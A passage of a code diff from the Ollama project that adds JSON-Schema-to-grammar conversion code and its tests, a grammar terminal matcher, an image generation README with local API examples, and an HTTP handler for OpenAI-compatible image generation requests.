|
||||
}
|
||||
|
||||
func (c *converter) constToExpr(v interface{}) string {
|
||||
switch val := v.(type) {
|
||||
case string:
|
||||
return fmt.Sprintf(`"\"%s\""`, c.escapeString(val))
|
||||
case float64:
|
||||
if val == float64(int(val)) {
|
||||
return fmt.Sprintf(`"%d"`, int(val))
|
||||
}
|
||||
return fmt.Sprintf(`"%v"`, val)
|
||||
case bool:
|
||||
if val {
|
||||
return `"true"`
|
||||
}
|
||||
return `"false"`
|
||||
case nil:
|
||||
return `"null"`
|
||||
default:
|
||||
c.usedTypes["string"] = true
|
||||
return "string"
|
||||
}
|
||||
}
|
||||
|
||||
func (c *converter) resolveRef(ref string) string {
|
||||
// Handle #/$defs/name references
|
||||
if strings.HasPrefix(ref, "#/$defs/") {
|
||||
defName := strings.TrimPrefix(ref, "#/$defs/")
|
||||
return c.resolveDefRef(defName)
|
||||
}
|
||||
|
||||
// Handle root recursion #
|
||||
if ref == "#" {
|
||||
return "root"
|
||||
}
|
||||
|
||||
// Unknown ref format
|
||||
c.usedTypes["string"] = true
|
||||
return "string"
|
||||
}
|
||||
|
||||
func (c *converter) resolveDefRef(defName string) string {
|
||||
// Check if we've already defined this as a rule
|
||||
ruleName := "def_" + defName
|
||||
if c.definedRefs[defName] {
|
||||
return ruleName
|
||||
}
|
||||
|
||||
// Mark as defined to prevent infinite recursion
|
||||
c.definedRefs[defName] = true
|
||||
|
||||
// Look up the definition
|
||||
if c.definitions == nil {
|
||||
c.usedTypes["string"] = true
|
||||
return "string"
|
||||
}
|
||||
|
||||
defSchema, ok := c.definitions[defName]
|
||||
if !ok {
|
||||
c.usedTypes["string"] = true
|
||||
return "string"
|
||||
}
|
||||
|
||||
// Generate the rule
|
||||
expr := c.schemaToExpr(defSchema, ruleName)
|
||||
c.rules = append(c.rules, fmt.Sprintf("%s = %s .", ruleName, expr))
|
||||
|
||||
return ruleName
|
||||
}
|
||||
|
||||
func (c *converter) getTypes(t interface{}) []string {
|
||||
switch v := t.(type) {
|
||||
case string:
|
||||
return []string{v}
|
||||
case []interface{}:
|
||||
var types []string
|
||||
for _, item := range v {
|
||||
if s, ok := item.(string); ok {
|
||||
types = append(types, s)
|
||||
}
|
||||
}
|
||||
return types
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (c *converter) escapeString(s string) string {
|
||||
s = strings.ReplaceAll(s, `\`, `\\`)
|
||||
s = strings.ReplaceAll(s, `"`, `\"`)
|
||||
return s
|
||||
}
|
||||
|
||||
// Grammar converts a JSON Schema string into a compiled grammar.
|
||||
func Grammar(schemaJSON string) (*grammar.Grammar, error) {
|
||||
ebnf, err := EBNF(schemaJSON)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
return grammar.ParseEBNF(ebnf, "root")
|
||||
}
|
||||
336
x/grammar/schema/schema_test.go
Normal file
336
x/grammar/schema/schema_test.go
Normal file
@@ -0,0 +1,336 @@
|
||||
//go:build mlx
|
||||
|
||||
package schema
|
||||
|
||||
import (
|
||||
"testing"
|
||||
|
||||
gram "github.com/ollama/ollama/x/grammar"
|
||||
"github.com/ollama/ollama/x/imagegen/mlx"
|
||||
)
|
||||
|
||||
func TestJSONEBNF(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
schema string
|
||||
}{
|
||||
{
|
||||
name: "simple object",
|
||||
schema: `{
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"name": {"type": "string"},
|
||||
"age": {"type": "integer"}
|
||||
},
|
||||
"required": ["name", "age"]
|
||||
}`,
|
||||
},
|
||||
{
|
||||
name: "with enum",
|
||||
schema: `{
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"status": {"enum": ["active", "inactive", "pending"]}
|
||||
},
|
||||
"required": ["status"]
|
||||
}`,
|
||||
},
|
||||
{
|
||||
name: "array of objects",
|
||||
schema: `{
|
||||
"type": "array",
|
||||
"items": {
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"id": {"type": "integer"}
|
||||
},
|
||||
"required": ["id"]
|
||||
}
|
||||
}`,
|
||||
},
|
||||
{
|
||||
name: "nested object",
|
||||
schema: `{
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"user": {
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"email": {"type": "string"}
|
||||
},
|
||||
"required": ["email"]
|
||||
}
|
||||
},
|
||||
"required": ["user"]
|
||||
}`,
|
||||
},
|
||||
}
|
||||
|
||||
for _, tc := range tests {
|
||||
t.Run(tc.name, func(t *testing.T) {
|
||||
ebnf, err := EBNF(tc.schema)
|
||||
if err != nil {
|
||||
t.Fatalf("EBNF failed: %v", err)
|
||||
}
|
||||
|
||||
// Try to compile it
|
||||
grammar, err := gram.ParseEBNF(ebnf, "root")
|
||||
if err != nil {
|
||||
t.Fatalf("ParseEBNF failed: %v", err)
|
||||
}
|
||||
|
||||
if grammar == nil {
|
||||
t.Fatal("grammar is nil")
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestGrammarEngine(t *testing.T) {
|
||||
schema := `{
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"name": {"type": "string"},
|
||||
"age": {"type": "integer"}
|
||||
},
|
||||
"required": ["name", "age"]
|
||||
}`
|
||||
|
||||
grammar, err := Grammar(schema)
|
||||
if err != nil {
|
||||
t.Fatalf("Grammar failed: %v", err)
|
||||
}
|
||||
|
||||
vocab := []string{
|
||||
"{", "}", "[", "]", ":", ",",
|
||||
"\"name\"", "\"age\"", "\"test\"",
|
||||
"\"", "a", "b", "c",
|
||||
"0", "1", "2", "3", "4", "5", "6", "7", "8", "9",
|
||||
" ", "\n",
|
||||
"true", "false", "null",
|
||||
}
|
||||
|
||||
engine, err := gram.NewEngine(grammar, vocab)
|
||||
if err != nil {
|
||||
t.Fatalf("grammar.NewEngine failed: %v", err)
|
||||
}
|
||||
defer engine.Close()
|
||||
|
||||
logits := mlx.Ones(int32(len(vocab)))
|
||||
mlx.Keep(logits)
|
||||
|
||||
// Test that we can apply mask
|
||||
masked := engine.ApplyMask(logits)
|
||||
mlx.Eval(masked)
|
||||
}
|
||||
|
||||
// TestOpenAIStructuredOutputs tests features required for OpenAI compatibility
|
||||
func TestOpenAIStructuredOutputs(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
schema string
|
||||
}{
|
||||
{
|
||||
name: "anyOf union",
|
||||
schema: `{
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"value": {
|
||||
"anyOf": [
|
||||
{"type": "string"},
|
||||
{"type": "integer"}
|
||||
]
|
||||
}
|
||||
},
|
||||
"required": ["value"]
|
||||
}`,
|
||||
},
|
||||
{
|
||||
name: "nullable string via type array",
|
||||
schema: `{
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"name": {"type": ["string", "null"]}
|
||||
},
|
||||
"required": ["name"]
|
||||
}`,
|
||||
},
|
||||
{
|
||||
name: "$ref with $defs",
|
||||
schema: `{
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"person": {"$ref": "#/$defs/Person"}
|
||||
},
|
||||
"required": ["person"],
|
||||
"$defs": {
|
||||
"Person": {
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"name": {"type": "string"},
|
||||
"age": {"type": "integer"}
|
||||
},
|
||||
"required": ["name", "age"]
|
||||
}
|
||||
}
|
||||
}`,
|
||||
},
|
||||
{
|
||||
name: "const value",
|
||||
schema: `{
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"type": {"const": "user"}
|
||||
},
|
||||
"required": ["type"]
|
||||
}`,
|
||||
},
|
||||
{
|
||||
name: "format date-time",
|
||||
schema: `{
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"created": {"type": "string", "format": "date-time"}
|
||||
},
|
||||
"required": ["created"]
|
||||
}`,
|
||||
},
|
||||
{
|
||||
name: "format date",
|
||||
schema: `{
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"birthday": {"type": "string", "format": "date"}
|
||||
},
|
||||
"required": ["birthday"]
|
||||
}`,
|
||||
},
|
||||
{
|
||||
name: "format email",
|
||||
schema: `{
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"email": {"type": "string", "format": "email"}
|
||||
},
|
||||
"required": ["email"]
|
||||
}`,
|
||||
},
|
||||
{
|
||||
name: "format uuid",
|
||||
schema: `{
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"id": {"type": "string", "format": "uuid"}
|
||||
},
|
||||
"required": ["id"]
|
||||
}`,
|
||||
},
|
||||
{
|
||||
name: "array with minItems maxItems",
|
||||
schema: `{
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"tags": {
|
||||
"type": "array",
|
||||
"items": {"type": "string"},
|
||||
"minItems": 1,
|
||||
"maxItems": 3
|
||||
}
|
||||
},
|
||||
"required": ["tags"]
|
||||
}`,
|
||||
},
|
||||
{
|
||||
name: "deeply nested with refs",
|
||||
schema: `{
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"company": {
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"name": {"type": "string"},
|
||||
"employees": {
|
||||
"type": "array",
|
||||
"items": {"$ref": "#/$defs/Employee"}
|
||||
}
|
||||
},
|
||||
"required": ["name", "employees"]
|
||||
}
|
||||
},
|
||||
"required": ["company"],
|
||||
"$defs": {
|
||||
"Employee": {
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"name": {"type": "string"},
|
||||
"role": {"enum": ["engineer", "manager", "intern"]}
|
||||
},
|
||||
"required": ["name", "role"]
|
||||
}
|
||||
}
|
||||
}`,
|
||||
},
|
||||
{
|
||||
name: "multiple refs same def",
|
||||
schema: `{
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"from": {"$ref": "#/$defs/Address"},
|
||||
"to": {"$ref": "#/$defs/Address"}
|
||||
},
|
||||
"required": ["from", "to"],
|
||||
"$defs": {
|
||||
"Address": {
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"city": {"type": "string"},
|
||||
"zip": {"type": "string"}
|
||||
},
|
||||
"required": ["city", "zip"]
|
||||
}
|
||||
}
|
||||
}`,
|
||||
},
|
||||
{
|
||||
name: "oneOf variant",
|
||||
schema: `{
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"result": {
|
||||
"oneOf": [
|
||||
{
|
||||
"type": "object",
|
||||
"properties": {"success": {"type": "boolean"}},
|
||||
"required": ["success"]
|
||||
},
|
||||
{
|
||||
"type": "object",
|
||||
"properties": {"error": {"type": "string"}},
|
||||
"required": ["error"]
|
||||
}
|
||||
]
|
||||
}
|
||||
},
|
||||
"required": ["result"]
|
||||
}`,
|
||||
},
|
||||
}
|
||||
|
||||
for _, tc := range tests {
|
||||
t.Run(tc.name, func(t *testing.T) {
|
||||
ebnf, err := EBNF(tc.schema)
|
||||
if err != nil {
|
||||
t.Fatalf("EBNF failed: %v", err)
|
||||
}
|
||||
|
||||
grammar, err := gram.ParseEBNF(ebnf, "root")
|
||||
if err != nil {
|
||||
t.Fatalf("ParseEBNF failed: %v", err)
|
||||
}
|
||||
|
||||
if grammar == nil {
|
||||
t.Fatal("grammar is nil")
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
105
x/grammar/terminal.go
Normal file
105
x/grammar/terminal.go
Normal file
@@ -0,0 +1,105 @@
|
||||
//go:build mlx
|
||||
|
||||
package grammar
|
||||
|
||||
import "unicode/utf8"
|
||||
|
||||
// terminalType distinguishes different kinds of grammar terminals
|
||||
type terminalType int
|
||||
|
||||
const (
|
||||
terminalLiteral terminalType = iota // Exact string: "true", "{"
|
||||
terminalRange // Character range: [a-z], [0-9]
|
||||
)
|
||||
|
||||
// terminal represents a compiled grammar terminal
|
||||
type terminal struct {
|
||||
ID int
|
||||
Type terminalType
|
||||
Pattern string // Original pattern from grammar
|
||||
Unescaped string // Unescaped literal (for terminalLiteral)
|
||||
LowRune rune // For unicode ranges: low bound
|
||||
HighRune rune // For unicode ranges: high bound
|
||||
}
|
||||
|
||||
// terminalMatch represents a terminal that matched at a position
|
||||
type terminalMatch struct {
|
||||
TerminalID int
|
||||
Length int // Number of bytes consumed
|
||||
}
|
||||
|
||||
// trieNode is a node in the literal matching trie
|
||||
type trieNode struct {
|
||||
children [256]*trieNode // Byte-indexed children
|
||||
terminalID int // -1 if not accepting, else terminal ID
|
||||
}
|
||||
|
||||
// terminalMatcher tests which terminals match at a position in a byte slice
|
||||
type terminalMatcher struct {
|
||||
// Trie for literal matching (fast path)
|
||||
literalTrie *trieNode
|
||||
|
||||
// Range terminals (single-byte matches)
|
||||
ranges []terminal
|
||||
|
||||
// All terminals for enumeration
|
||||
terminals []terminal
|
||||
|
||||
// Pattern to terminal ID map for fast lookup (keyed by raw pattern)
|
||||
patternToID map[string]int
|
||||
}
|
||||
|
||||
// addLiteralToTrie adds a literal pattern to the trie
|
||||
func (m *terminalMatcher) addLiteralToTrie(pattern string, terminalID int) {
|
||||
node := m.literalTrie
|
||||
for i := 0; i < len(pattern); i++ {
|
||||
c := pattern[i]
|
||||
if node.children[c] == nil {
|
||||
node.children[c] = &trieNode{terminalID: -1}
|
||||
}
|
||||
node = node.children[c]
|
||||
}
|
||||
node.terminalID = terminalID
|
||||
}
|
||||
|
||||
// matchesAt returns all terminals that match at pos in data
|
||||
func (m *terminalMatcher) matchesAt(data []byte, pos int) []terminalMatch {
|
||||
if pos >= len(data) {
|
||||
return nil
|
||||
}
|
||||
|
||||
var matches []terminalMatch
|
||||
|
||||
// Check literal matches via trie
|
||||
node := m.literalTrie
|
||||
for i := pos; i < len(data) && node != nil; i++ {
|
||||
c := data[i]
|
||||
node = node.children[c]
|
||||
if node != nil && node.terminalID >= 0 {
|
||||
matches = append(matches, terminalMatch{
|
||||
TerminalID: node.terminalID,
|
||||
Length: i - pos + 1,
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
// Check range matches (unicode-aware)
|
||||
r, runeLen := utf8.DecodeRune(data[pos:])
|
||||
if r != utf8.RuneError {
|
||||
for _, rng := range m.ranges {
|
||||
if r >= rng.LowRune && r <= rng.HighRune {
|
||||
matches = append(matches, terminalMatch{
|
||||
TerminalID: rng.ID,
|
||||
Length: runeLen,
|
||||
})
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return matches
|
||||
}
|
||||
|
||||
// terminalCount returns the number of terminals
|
||||
func (m *terminalMatcher) terminalCount() int {
|
||||
return len(m.terminals)
|
||||
}
|
||||
@@ -1,61 +1,236 @@
|
||||
# imagegen
|
||||
# Image Generation in Ollama (Experimental)
|
||||
|
||||
This is a package that uses MLX to run image generation models, ahead of being integrated into Ollama's primary runner.
|
||||
in `CMakeLists.txt` and rebuild.
|
||||
Generate images from text prompts using local AI models.
|
||||
|
||||
### 1. Download a Model
|
||||
|
||||
Download Llama 3.1 8B (or any compatible model) in safetensors format:
|
||||
## Quick Start
|
||||
|
||||
```bash
|
||||
mkdir -p ./weights
|
||||
|
||||
# Example using huggingface-cli
|
||||
hf download meta-llama/Llama-3.1-8B --local-dir ./weights/Llama-3.1-8B
|
||||
hf download openai/gpt-oss-20b --local-dir ./weights/gpt-oss-20b
|
||||
# Run with a prompt
|
||||
ollama run z-image "a sunset over mountains"
|
||||
Generating: step 30/30
|
||||
Image saved to: /tmp/ollama-image-1704067200.png
|
||||
```
|
||||
|
||||
### 2. Run Inference
|
||||
On macOS, the generated image will automatically open in Preview.
|
||||
|
||||
## Supported Models
|
||||
|
||||
| Model | VRAM Required | Notes |
|
||||
|-------|---------------|-------|
|
||||
| z-image | ~12GB | Based on Flux architecture |
|
||||
|
||||
## CLI Usage
|
||||
|
||||
```bash
|
||||
# Build
|
||||
go build ./cmd/engine
|
||||
# Generate an image
|
||||
ollama run z-image "a cat playing piano"
|
||||
|
||||
# Text generation
|
||||
./engine -model ./weights/Llama-3.1-8B -prompt "Hello, world!" -max-tokens 250
|
||||
# Check if model is running
|
||||
ollama ps
|
||||
|
||||
# Qwen-Image 2512 (text-to-image)
|
||||
./engine -qwen-image -model ./weights/Qwen-Image-2512 -prompt "A mountain landscape at sunset" \
|
||||
-width 1024 -height 1024 -steps 20 -seed 42 -output landscape.png
|
||||
|
||||
# Qwen-Image Edit (experimental) - 8 steps for speed, but model recommends 50
|
||||
./engine -qwen-image-edit -model ./weights/Qwen-Image-Edit-2511 \
|
||||
-input-image input.png -prompt "Make it winter" -negative-prompt " " -cfg-scale 4.0 \
|
||||
-steps 8 -seed 42 -output edited.png
|
||||
# Stop the model
|
||||
ollama stop z-image
|
||||
```
|
||||
|
||||
## Memory Management
|
||||
## API
|
||||
|
||||
MLX Python/C++ uses scope-based memory management - arrays are freed when they go out of scope. Go's garbage collector is non-deterministic, so we can't rely on finalizers to free GPU memory promptly.
|
||||
### OpenAI-Compatible Endpoint
|
||||
|
||||
Instead, arrays are automatically tracked and freed on `Eval()`:
|
||||
|
||||
```go
|
||||
// All arrays are automatically tracked when created
|
||||
x := mlx.Add(a, b)
|
||||
y := mlx.Matmul(x, w)
|
||||
|
||||
// Eval frees non-kept arrays, evaluates outputs (auto-kept)
|
||||
mlx.Eval(y)
|
||||
|
||||
// After copying to CPU, free the array
|
||||
data := y.Data()
|
||||
y.Free()
|
||||
```bash
|
||||
POST /v1/images/generations
|
||||
```
|
||||
|
||||
Key points:
|
||||
**Request:**
|
||||
```json
|
||||
{
|
||||
"model": "z-image",
|
||||
"prompt": "a sunset over mountains",
|
||||
"size": "1024x1024",
|
||||
"response_format": "b64_json"
|
||||
}
|
||||
```
|
||||
|
||||
- All created arrays are automatically tracked
|
||||
- `mlx.Eval(outputs...)` frees non-kept arrays, evaluates outputs (outputs auto-kept)
|
||||
- `mlx.Keep(arrays...)` marks arrays to survive multiple Eval cycles (for weights, caches)
|
||||
- Call `.Free()` when done with an array
|
||||
**Response:**
|
||||
```json
|
||||
{
|
||||
"created": 1704067200,
|
||||
"data": [
|
||||
{
|
||||
"b64_json": "iVBORw0KGgo..."
|
||||
}
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
### Example: cURL
|
||||
|
||||
```bash
|
||||
curl http://localhost:11434/v1/images/generations \
|
||||
-H "Content-Type: application/json" \
|
||||
-d '{
|
||||
"model": "z-image",
|
||||
"prompt": "a white cat",
|
||||
"size": "1024x1024"
|
||||
}'
|
||||
```
|
||||
|
||||
### Example: Save to File
|
||||
|
||||
```bash
|
||||
curl -s http://localhost:11434/v1/images/generations \
|
||||
-H "Content-Type: application/json" \
|
||||
-d '{
|
||||
"model": "z-image",
|
||||
"prompt": "a white cat",
|
||||
"size": "1024x1024"
|
||||
}' | jq -r '.data[0].b64_json' | base64 -d > image.png
|
||||
```
|
||||
|
||||
### Streaming Progress
|
||||
|
||||
Enable streaming to receive progress updates via SSE:
|
||||
|
||||
```bash
|
||||
curl http://localhost:11434/v1/images/generations \
|
||||
-H "Content-Type: application/json" \
|
||||
-d '{"model": "z-image", "prompt": "a sunset", "stream": true}'
|
||||
```
|
||||
|
||||
Events:
|
||||
```
|
||||
event: progress
|
||||
data: {"step": 1, "total": 30}
|
||||
|
||||
event: progress
|
||||
data: {"step": 2, "total": 30}
|
||||
...
|
||||
|
||||
event: done
|
||||
data: {"created": 1704067200, "data": [{"b64_json": "..."}]}
|
||||
```
|
||||
|
||||
## Parameters
|
||||
|
||||
| Parameter | Type | Default | Description |
|
||||
|-----------|------|---------|-------------|
|
||||
| model | string | required | Model name |
|
||||
| prompt | string | required | Text description of image |
|
||||
| size | string | "1024x1024" | Image dimensions (WxH) |
|
||||
| n | int | 1 | Number of images (currently only 1 supported) |
|
||||
| response_format | string | "b64_json" | "b64_json" or "url" |
|
||||
| stream | bool | false | Enable progress streaming |
|
||||
|
||||
## Requirements
|
||||
|
||||
- macOS with Apple Silicon (M1/M2/M3/M4)
|
||||
- CUDA: tested on CUDA 12 Blackwell, more testing coming soon
|
||||
- Sufficient VRAM (see model table above)
|
||||
- Ollama built with MLX support
|
||||
|
||||
## Limitations
|
||||
|
||||
- macOS only (uses MLX backend)
|
||||
- Single image per request
|
||||
- Fixed step count (30 steps)
|
||||
- Modelfiles not yet supported (use `ollama create` from model directory)
|
||||
|
||||
---
|
||||
|
||||
# Tensor Model Storage Format
|
||||
|
||||
Tensor models store each tensor as a separate blob with metadata in the manifest. This enables faster downloads (parallel fetching) and deduplication (shared tensors are stored once).
|
||||
|
||||
## Manifest Structure
|
||||
|
||||
The manifest follows the standard ollama format with tensor-specific layer metadata:
|
||||
|
||||
```json
|
||||
{
|
||||
"schemaVersion": 2,
|
||||
"mediaType": "application/vnd.docker.distribution.manifest.v2+json",
|
||||
"config": { "digest": "sha256:...", "size": 1234 },
|
||||
"layers": [
|
||||
{
|
||||
"mediaType": "application/vnd.ollama.image.tensor",
|
||||
"digest": "sha256:25b36eed...",
|
||||
"size": 49807448,
|
||||
"name": "text_encoder/model.layers.0.mlp.down_proj.weight",
|
||||
"dtype": "BF16",
|
||||
"shape": [2560, 9728]
|
||||
},
|
||||
{
|
||||
"mediaType": "application/vnd.ollama.image.json",
|
||||
"digest": "sha256:abc123...",
|
||||
"size": 512,
|
||||
"name": "text_encoder/config.json"
|
||||
}
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
Each tensor layer includes:
|
||||
- `name`: Path-style tensor name (e.g., `text_encoder/model.layers.0.mlp.down_proj.weight`)
|
||||
- `dtype`: Data type (BF16, F32, etc.)
|
||||
- `shape`: Tensor dimensions
|
||||
|
||||
Config layers use the same path-style naming (e.g., `tokenizer/tokenizer.json`).
|
||||
|
||||
## Blob Format
|
||||
|
||||
Each tensor blob is a minimal safetensors file:
|
||||
|
||||
```
|
||||
[8 bytes: header size (uint64 LE)]
|
||||
[~80 bytes: JSON header, padded to 8-byte alignment]
|
||||
[N bytes: raw tensor data]
|
||||
```
|
||||
|
||||
Header contains a single tensor named `"data"`:
|
||||
|
||||
```json
|
||||
{"data":{"dtype":"BF16","shape":[2560,9728],"data_offsets":[0,49807360]}}
|
||||
```
|
||||
|
||||
## Why Include the Header?
|
||||
|
||||
The ~88 byte safetensors header enables MLX's native `mlx_load_safetensors` function, which:
|
||||
|
||||
1. **Uses mmap** - Maps file directly into memory, no copies
|
||||
2. **Zero-copy to GPU** - MLX reads directly from mapped pages
|
||||
3. **No custom code** - Standard MLX API, battle-tested
|
||||
|
||||
Without the header, we'd need custom C++ code to create MLX arrays from raw mmap'd data. MLX's public API doesn't expose this - it always copies when creating arrays from external pointers.
|
||||
|
||||
The overhead is negligible: 88 bytes per tensor = ~100KB total for a 13GB model (0.0007%).
|
||||
|
||||
## Why Per-Tensor Blobs?
|
||||
|
||||
**Deduplication**: Blobs are content-addressed by SHA256. If two models share identical tensors (same weights, dtype, shape), they share the same blob file.
|
||||
|
||||
Example: Model A and Model B both use the same text encoder. The text encoder's 400 tensors are stored once, referenced by both manifests.
|
||||
|
||||
```
|
||||
~/.ollama/models/
|
||||
blobs/
|
||||
sha256-25b36eed... <- shared by both models
|
||||
sha256-abc123...
|
||||
manifests/
|
||||
library/model-a/latest <- references sha256-25b36eed
|
||||
library/model-b/latest <- references sha256-25b36eed
|
||||
```
|
||||
|
||||
## Import Flow
|
||||
|
||||
```
|
||||
cd ./weights/Z-Image-Turbo
|
||||
ollama create z-image
|
||||
|
||||
1. Scan component directories (text_encoder/, transformer/, vae/)
|
||||
2. For each .safetensors file:
|
||||
- Extract individual tensors
|
||||
- Wrap each in minimal safetensors format (88B header + data)
|
||||
- Write to blob store (SHA256 content-addressed)
|
||||
- Add layer entry to manifest with path-style name
|
||||
3. Copy config files (*.json) as config layers
|
||||
4. Write manifest
|
||||
```
|
||||
|
||||
235
x/imagegen/api/handler.go
Normal file
235
x/imagegen/api/handler.go
Normal file
@@ -0,0 +1,235 @@
|
||||
package api
|
||||
|
||||
import (
|
||||
"encoding/base64"
|
||||
"fmt"
|
||||
"net/http"
|
||||
"os"
|
||||
"strconv"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"github.com/gin-gonic/gin"
|
||||
|
||||
"github.com/ollama/ollama/api"
|
||||
"github.com/ollama/ollama/llm"
|
||||
"github.com/ollama/ollama/x/imagegen"
|
||||
)
|
||||
|
||||
// RunnerScheduler is the interface for scheduling a model runner.
|
||||
// This is implemented by server.Server to avoid circular imports.
|
||||
type RunnerScheduler interface {
|
||||
ScheduleImageGenRunner(ctx *gin.Context, modelName string, opts api.Options, keepAlive *api.Duration) (llm.LlamaServer, error)
|
||||
}
|
||||
|
||||
// RegisterRoutes registers the image generation API routes.
|
||||
func RegisterRoutes(r gin.IRouter, scheduler RunnerScheduler) {
|
||||
r.POST("/v1/images/generations", func(c *gin.Context) {
|
||||
ImageGenerationHandler(c, scheduler)
|
||||
})
|
||||
}
|
||||
|
||||
// ImageGenerationHandler handles OpenAI-compatible image generation requests.
|
||||
func ImageGenerationHandler(c *gin.Context, scheduler RunnerScheduler) {
|
||||
var req ImageGenerationRequest
|
||||
if err := c.BindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": gin.H{"message": err.Error()}})
|
||||
return
|
||||
}
|
||||
|
||||
// Validate required fields
|
||||
if req.Model == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": gin.H{"message": "model is required"}})
|
||||
return
|
||||
}
|
||||
if req.Prompt == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": gin.H{"message": "prompt is required"}})
|
||||
return
|
||||
}
|
||||
|
||||
// Apply defaults
|
||||
if req.N == 0 {
|
||||
req.N = 1
|
||||
}
|
||||
if req.Size == "" {
|
||||
req.Size = "1024x1024"
|
||||
}
|
||||
if req.ResponseFormat == "" {
|
||||
req.ResponseFormat = "b64_json"
|
||||
}
|
||||
|
||||
// Verify model exists
|
||||
if imagegen.ResolveModelName(req.Model) == "" {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": gin.H{"message": fmt.Sprintf("model %q not found", req.Model)}})
|
||||
return
|
||||
}
|
||||
|
||||
// Parse size
|
||||
width, height := parseSize(req.Size)
|
||||
|
||||
// Build options - we repurpose NumCtx/NumGPU for width/height
|
||||
opts := api.Options{}
|
||||
opts.NumCtx = int(width)
|
||||
opts.NumGPU = int(height)
|
||||
|
||||
// Schedule runner
|
||||
runner, err := scheduler.ScheduleImageGenRunner(c, req.Model, opts, nil)
|
||||
if err != nil {
|
||||
status := http.StatusInternalServerError
|
||||
if strings.Contains(err.Error(), "not found") {
|
||||
status = http.StatusNotFound
|
||||
}
|
||||
c.JSON(status, gin.H{"error": gin.H{"message": err.Error()}})
|
||||
return
|
||||
}
|
||||
|
||||
// Build completion request
|
||||
completionReq := llm.CompletionRequest{
|
||||
Prompt: req.Prompt,
|
||||
Options: &opts,
|
||||
}
|
||||
|
||||
if req.Stream {
|
||||
handleStreamingResponse(c, runner, completionReq, req.ResponseFormat)
|
||||
} else {
|
||||
handleNonStreamingResponse(c, runner, completionReq, req.ResponseFormat)
|
||||
}
|
||||
}
|
||||
|
||||
func handleStreamingResponse(c *gin.Context, runner llm.LlamaServer, req llm.CompletionRequest, format string) {
|
||||
c.Header("Content-Type", "text/event-stream")
|
||||
c.Header("Cache-Control", "no-cache")
|
||||
c.Header("Connection", "keep-alive")
|
||||
|
||||
var imagePath string
|
||||
err := runner.Completion(c.Request.Context(), req, func(resp llm.CompletionResponse) {
|
||||
if resp.Done {
|
||||
imagePath = extractPath(resp.Content)
|
||||
} else {
|
||||
progress := parseProgress(resp.Content)
|
||||
if progress.Total > 0 {
|
||||
c.SSEvent("progress", progress)
|
||||
c.Writer.Flush()
|
||||
}
|
||||
}
|
||||
})
|
||||
if err != nil {
|
||||
c.SSEvent("error", gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
c.SSEvent("done", buildResponse(imagePath, format))
|
||||
}
|
||||
|
||||
func handleNonStreamingResponse(c *gin.Context, runner llm.LlamaServer, req llm.CompletionRequest, format string) {
|
||||
var imagePath string
|
||||
err := runner.Completion(c.Request.Context(), req, func(resp llm.CompletionResponse) {
|
||||
if resp.Done {
|
||||
imagePath = extractPath(resp.Content)
|
||||
}
|
||||
})
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": gin.H{"message": err.Error()}})
|
||||
return
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, buildResponse(imagePath, format))
|
||||
}
|
||||
|
||||
func parseSize(size string) (int32, int32) {
|
||||
parts := strings.Split(size, "x")
|
||||
if len(parts) != 2 {
|
||||
return 1024, 1024
|
||||
}
|
||||
w, _ := strconv.Atoi(parts[0])
|
||||
h, _ := strconv.Atoi(parts[1])
|
||||
if w == 0 {
|
||||
w = 1024
|
||||
}
|
||||
if h == 0 {
|
||||
h = 1024
|
||||
}
|
||||
return int32(w), int32(h)
|
||||
}
|
||||
|
||||
func extractPath(content string) string {
|
||||
if idx := strings.Index(content, "Image saved to: "); idx >= 0 {
|
||||
return strings.TrimSpace(content[idx+16:])
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
func parseProgress(content string) ImageProgressEvent {
|
||||
var step, total int
|
||||
fmt.Sscanf(content, "\rGenerating: step %d/%d", &step, &total)
|
||||
return ImageProgressEvent{Step: step, Total: total}
|
||||
}
|
||||
|
||||
func buildResponse(imagePath, format string) ImageGenerationResponse {
|
||||
resp := ImageGenerationResponse{
|
||||
Created: time.Now().Unix(),
|
||||
Data: make([]ImageData, 1),
|
||||
}
|
||||
|
||||
if imagePath == "" {
|
||||
return resp
|
||||
}
|
||||
|
||||
if format == "url" {
|
||||
resp.Data[0].URL = "file://" + imagePath
|
||||
} else {
|
||||
data, err := os.ReadFile(imagePath)
|
||||
if err == nil {
|
||||
resp.Data[0].B64JSON = base64.StdEncoding.EncodeToString(data)
|
||||
}
|
